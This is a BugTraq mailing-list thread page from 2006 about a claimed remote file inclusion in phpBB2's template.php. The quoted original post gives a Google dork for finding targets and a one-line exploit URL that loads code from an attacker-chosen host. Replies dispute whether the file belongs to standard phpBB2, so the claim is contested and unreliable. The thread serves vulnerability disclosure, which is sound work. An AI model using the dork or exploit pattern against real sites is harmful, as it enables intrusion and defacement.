BugTraq
phpBB2 (template.php) Remote File Inclusion Jun 03 2006 10:47AM
canberx linuxmail org (2 replies)
Re: phpBB2 (template.php) Remote File Inclusion Jun 05 2006 10:14AM
ad (at) heapoverflow (dot) com [email concealed] (ad heapoverflow com) (3 replies)
Re: phpBB2 (template.php) Remote File Inclusion Jun 06 2006 01:47AM
Paul Laudanski (zx castlecops com)
Re: phpBB2 (template.php) Remote File Inclusion Jun 06 2006 12:30AM
Aaron Klein (klein aaron gmail com)
Template.php is a file that exists in the standard phpbb2 distro but
there are also dozens of mods that change code in and/or replace the
standard template.php file to enable new functionality. Its possible
the items mentioned in the first report is based upon a hacked
template.php file and not the standard one that came with phpbb2. If
thats the case the issue is not with template.php from phpbb2's
standard distro but with a particular mod.

On 6/5/06, ad (at) heapoverflow (dot) com [email concealed] <ad (at) heapoverflow (dot) com [email concealed]> wrote:
> template.php is an addon and not part of phpbb2, noobs....
>
>
> canberx (at) linuxmail (dot) org [email concealed] wrote:
> > ********************************************************************
> >
> > *Title:
> >
> > *phpBB2 Remote File Include
> >
> > *
> >
> > *
> >
> > *Credit:
> >
> > *Canberx
> >
> > *
> >
> > *
> >
> > *Thanx:
> >
> > *Forewer-Partizan
> >
> > *
> >
> > *
> >
> > *Mail:
> >
> > *canberx (at) linuxmail (dot) org [email concealed] www.canberx.tk
> >
> > *
> >
> > *
> >
> > *Google Dork:
> >
> > *Powered by phpBB (c) 2001, 2002 phpBB Group
> >
> > *
> >
> > *
> >
> > *Exploit:
> >
> > *www.target.com/[path_to_phpbb]/template.php?page=[attacker]
> >
> > *
> >
> > *
> >
> > *********************************************************************
> >
> >
> > Plz Don't Hacked site if it already has been defaced :)
> >
> >
> > *********************************************************************
> >
> >
> > __________ NOD32 1.1578 (20060604) Information __________
> >
> > This message was checked by NOD32 antivirus system.
> > http://www.eset.com
> >
> >
> >
> >
>
>
>
>

--
Have pets? Get the help you need from the Pet Advice Network.
We have 6 websites ready to help you. http://www.petadvice.net

[ reply ]
Re: phpBB2 (template.php) Remote File Inclusion Jun 05 2006 09:05PM
Jessica Hope (jessicasaulhope googlemail com)
RE: phpBB2 (template.php) Remote File Inclusion Jun 04 2006 10:08PM
Scrouaf _ (scrouaf hotmail com)


 

Privacy Statement
Copyright 2010, SecurityFocus